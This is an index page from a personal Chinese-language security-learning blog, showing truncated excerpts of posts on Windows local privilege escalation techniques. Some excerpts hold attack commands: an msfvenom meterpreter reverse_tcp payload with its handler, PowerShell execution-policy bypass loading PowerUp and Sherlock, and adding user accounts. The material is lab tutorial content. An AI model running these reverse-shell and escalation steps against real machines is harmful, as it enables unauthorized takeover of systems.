InfoSec learning 
  • Home
  • Archives
  • Categories
  • Tags
  •   
root@whale3070:~# _

windows本地提权之命名管道

windows本地提权之命名管道参考资料: windows-namedpipes-privilege-escalation what-happens-when-i-type-getsystem/ https://metasploit.help.rapid7.com/docs/getsystem-command-work https://www.anquanke.com/post/id/87292

2020-02-17
windows
windows

总是以管理员权限安装的提权

参考资料:https://hacknpentest.com/windows-privilege-escalation-via-alwaysinstallelevated-technique/视频地址作者注:跟linux中的suid权限有点像,某种应用程序,普通用户可以运行,并且程序有着管理员权限。 发现漏洞12reg query HKLM\Software\Policies\Microsoft\W

2020-02-17
windows
windows

可修改的自启程序提权

参考资料: youtubu视频 我的视频教程:https://www.bilibili.com/video/av89635859/ 漏洞原理可修改的自启程序提权是利用了自启程序权限不正确。C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe找到开机自启的程序 C:\Users\User\Desktop\Tools\Accesschk\acce

2020-02-16
windows
windows

windows本地提权服务之可执行文件

windows本地提权服务之可执行文件b站上的视频教程 漏洞原理是windows服务权限配置不当,任何人都可以修改服务的应用程序。将恶意代码复制到服务的应用程序末尾,重新启动该服务,即可利用漏洞。 运行powershell脚本发现漏洞1234powershell -nop -ep bypassImport-Module C:\Users\user\Desktop\PowerUp.ps1Get-Mo

2020-02-16
windows
windows

windows服务之注册表提权

windows服务之注册表提权b站上的视频教程 用户权限NT Authority \ SYSTEM又称LocalSystem帐户是内置的Windows帐户。 它是Windows本地实例上功能最强大的帐户(比任何管理员帐户都更强大)。 大多数系统级别(Windows Services)服务和其他一些第三方服务都在帐户中运行 NT Authority \ SYSTEM 是Builtin\Adminis

2020-02-15
windows
windows

未打引号的路径&windows本地提权

我录制了一个演示视频 meterpreter开启监听123456789msfconsolehandler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcpmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f ex

2020-02-14
windows
windows

windows-cmd用户管理命令

查看查看用户net user 用户 查看用户组net localgroup administrators(用户组) 查看防火墙状态Windows Server 2012 R2 Standardnetsh advfirewall show allprofiles 添加添加用户net user 用户名 密码 /add /expires:never 添加用户密码net user Administrato

2020-02-12
windows
windows

windows服务提权&dll劫持

参考资料: dll劫持 sc.exe windows 服务管理 youtube视频 制作了一个youtube视频,下面是用到的一些命令。 sc是一个管理主机服务的工具 查看一个服务的运行状态 ,sc query 服务名 查看一个服务的配置信息 ,sc qc 服务名 【windows】 1234567891011whoamiC:\Program Files\DLL Hijack Service\

2020-02-12
windows
windows

binpath本地提权

binpath本地提权是利用了服务权限不正确。在youtube上传了一个演示视频 参考资料:https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_windows.html 上一篇提到过,sc.exe是一个管理windows服务的命令。 检查服务配置的权限是否不安全C:\Users\User\Desktop\Tools\Access

2020-02-12
windows
windows

windows内核提权

参考资料: github项目lpeworkshop youtubu视频 【windows】 123powershell -nop -ep bypassImport-Module C:\Users\whale\Desktop\Tools\Sherlock\Sherlock.ps1Find-AllVulns 【kali】 1234msfconsolehandler -H 192.168.1.100

2020-02-10
windows
windows
1…7071727374…98

Search

Whale3070
总访问量 次 总访客数 人